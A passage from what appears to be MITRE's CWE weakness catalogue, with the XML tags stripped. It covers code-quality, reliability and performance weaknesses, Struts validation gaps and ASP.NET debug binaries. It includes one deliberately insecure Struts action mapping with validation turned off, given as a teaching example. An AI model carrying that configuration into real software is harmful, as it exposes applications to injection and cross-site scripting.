+ updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs unconditional control transfer (such as a + "goto") in code outside of a branching structure such as a switch + block. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-1 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product's architecture, source code, design, documentation, + or other artifact does not follow required conventions. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code performs a comparison such as an + equality test between two float (floating point) values, but + it uses comparison operators that do not account for the + possibility of loss of precision. + + Numeric calculation using floating point values + can generate imprecise results because of rounding errors. + As a result, two different calculations might generate + numbers that are mathematically equal, but have slightly + different bit representations that do not translate to the + same mathematically-equal values. As a result, an equality + test or other comparison might produce unexpected + results. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-9 + + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The source code does not follow + desired style or formatting for indentation, white + space, comments, etc. + + + + + + Indirect + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A parent class contains one or more child classes, but the parent class does not have a virtual destructor method. + This issue can prevent the product from running reliably due to undefined or unexpected behaviors. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-16 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Every Action Form must have a corresponding validation form. + If a Struts Action Form Mapping specifies a form, it must have a validation form defined under the Struts Validator. + + + + + + + Primary + + + + + + + + Implementation + + + + + Other + Other + If an action form mapping does not have a validation form defined, it may be vulnerable to a number of attacks that rely on unchecked input. Unchecked input is the root cause of some of today's worst and most common software security problems. Cross-site scripting, SQL injection, and process control vulnerabilities all stem from incomplete or absent input validation. + + + Confidentiality + Integrity + Availability + Other + Other + Although J2EE applications are not generally susceptible to memory corruption attacks, if a J2EE application interfaces with native code that does not perform array bounds checking, an attacker may be able to use an input validation mistake in the J2EE application to launch a buffer overflow attack. + + + + + Implementation + Input Validation + + Map every Action Form to a corresponding validation form. + An action or a form may perform validation in other ways, but the Struts Validator provides an excellent way to verify that all input receives at least a basic level of validation. Without this approach, it is difficult, and often impossible, to establish with a high level of confidence that all input is validated. + + + + + + Struts: Unvalidated Action Form + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Common_Consequences, Description, Other_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A source code file has too many lines of + code. + This issue makes it more difficult to understand and/or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + While the interpretation of "too many lines of code" may vary for each product or developer, CISQ recommends a default threshold value of 1000. + + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-8 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code contains a class instance that calls the method or function to delete or destroy itself. + For example, in C++, "delete this" will cause the object to delete itself. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-7 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product is intended to manage data access through a particular data manager component such as a relational or non-SQL database, but it contains code that performs data access operations without using that component. + When the product has a data access component, the design may be intended to handle all data access operations through that component. If a data access operation is performed outside of that component, then this may indicate a violation of the intended design. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-10 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A function or method contains too many + operations that utilize a data manager or file resource. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + While the interpretation of "too many operations" may vary for each product or developer, CISQ recommends a default maximum of 7 operations for the same data manager or file. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-14 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A function, method, procedure, etc. contains an excessive amount of code that has been + commented out within its body. + This issue makes it more difficult to maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + While the interpretation of "excessive volume" may vary for each product or developer, CISQ recommends a default threshold of 2% of commented code. + + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-6 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A class contains an unnecessarily large number of + children. + This issue makes it more difficult to understand and maintain the software, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + While the interpretation of "large number of children" may vary for each product or developer, CISQ recommends a default maximum of 10 child classes. + + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-18 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A class contains a virtual method, but the method does not have an associated virtual destructor. + This issue can prevent the product from running reliably, e.g. due to undefined behavior. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-15 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code has a synchronous call to a remote resource, but there is no timeout for the call, or the timeout is set to infinite. + This issue can prevent the product from running reliably, since an outage for the remote resource can cause the product to hang. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-19 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a large data table that contains an excessively large number of + indices. + This issue can make the product perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + While the interpretation of "large data table" and "excessively large number of indices" may vary for each product or developer, CISQ recommends a default threshold of 1000000 rows for a "large" table and a default threshold of 3 indices. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-6 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Automatic filtering via a Struts bean has been turned off, which disables the Struts Validator and custom validation logic. This exposes the application to other weaknesses related to insufficient input validation. + + + + + + + Primary + + + + + + + + Implementation + + + + + Access Control + Bypass Protection Mechanism + + + + + Implementation + Ensure that an action form mapping enables validation. Set the validate field to true. + + + + + This mapping defines an action for a download form: + + <action path="/download"type="com.website.d2.action.DownloadAction"name="downloadForm"scope="request"input=".download"validate="false"></action> + + This mapping has disabled validation. Disabling validation exposes this action to numerous types of attacks. + + + + + Struts: Validator Turned Off + + + SFP24 + Tainted input to command + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The Action Form mapping in the demonstrative example disables the form's validate() method. The Struts bean: write tag automatically encodes special HTML characters, replacing a < with "&lt;" and a > with "&gt;". This action can be disabled by specifying filter="false" as an attribute of the tag to disable specified JSP pages. However, being disabled makes these pages susceptible to cross-site scripting attacks. An attacker may be able to insert malicious scripts as user input to write to these JSP pages. + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2010-06-21 + updated Other_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Causal_Nature, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A method for a class performs an operation that directly + accesses a member element from another class. + This issue suggests poor encapsulation and makes it more difficult to understand and maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-16 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains a method that accesses an object but does not later invoke + the element's associated finalize/destructor method. + This issue can make the product perform more slowly by retaining memory and/or other resources longer than necessary. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-15 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses the same control element across multiple + architectural layers. + This issue makes it more difficult to understand and maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-10 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses an unnecessarily complex internal representation for its data structures or interrelationships between those structures. + This issue makes it more difficult to understand or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + Other + Reduce Performance + + + + Allowed-with-Review + This CWE entry is a Class and might have Base-level children that would be more appropriate + Examine children of this entry to see if there is a better fit + + + + + + + CWE Content Team + MITRE + 2018-07-29 + 3.2 + 2019-01-03 + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product contains an index range scan for a large data table, + but the scan can cover a large number of rows. + This issue can make the product perform more slowly. If the relevant code is reachable by an attacker, then this performance problem might introduce a vulnerability. + While the interpretation of "large data table" and "excessive index range" may vary for each product or developer, CISQ recommends a threshold of 1000000 table rows and a threshold of 10 for the index range. + + + + + + Indirect + + + + + Other + Reduce Performance + + + + + ASCPEM-PRF-7 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a loop with a control flow condition based on + a value that is updated within the body of the loop. + This issue makes it more difficult to understand and/or maintain the product, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + Other + Reduce Maintainability + + + + + ASCMM-MNT-5 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product implements a Singleton design pattern but does not use appropriate locking or other synchronization mechanism to ensure that the singleton class is only instantiated once. + This issue can prevent the product from running reliably, e.g. by making the instantiation process non-thread-safe and introducing deadlock (CWE-833) or livelock conditions. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-12 + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a storable data element that does not have + all of the associated functions or methods that are necessary to support + comparison. + For example, with Java, a class that is made persistent requires both hashCode() and equals() methods to be defined. + This issue can prevent the product from running reliably, due to incorrect or unexpected comparison results. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-4 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The code contains a data element with a pointer that does not have an associated copy or constructor method. + This issue can prevent the product from running reliably. If the relevant code is reachable by an attacker, then this reliability problem might introduce a vulnerability. + + + + + + Indirect + + + + + Other + Reduce Reliability + + + + + ASCRM-RLB-6 + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product's code, documentation, or other artifacts do not + consistently use the same naming conventions for variables, callables, groups of + related callables, I/O capabilities, data types, file names, or similar types of + elements. + This issue makes it more difficult to understand and/or maintain the product due to inconsistencies, which indirectly affects security by making it more difficult or time-consuming to find and/or fix vulnerabilities. It also might make it easier to introduce vulnerabilities. + + + + + + Indirect + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2018-07-02 + 3.2 + 2019-01-03 + Entry derived from Common Quality Enumeration (CQE) Draft 0.9. + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Debugging messages help attackers learn about the system and plan a form of attack. + ASP .NET applications can be configured to produce debug binaries. These binaries give detailed debugging messages and should not be used in production environments. Debug binaries are meant to be used in a development or testing environment and can pose a security risk if they are deployed to production. + + + + + + + + The debug attribute of the <compilation> tag defines whether compiled binaries should include debugging information. The use of debug binaries causes an application to provide as much information about itself as possible to the user. + + + + Implementation + + + Build and Compilation + + + + + Confidentiality + Read Application Data + Attackers can leverage the additional information they gain from debugging output to mount attacks targeted on the framework, database, or other resources used by the application. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security 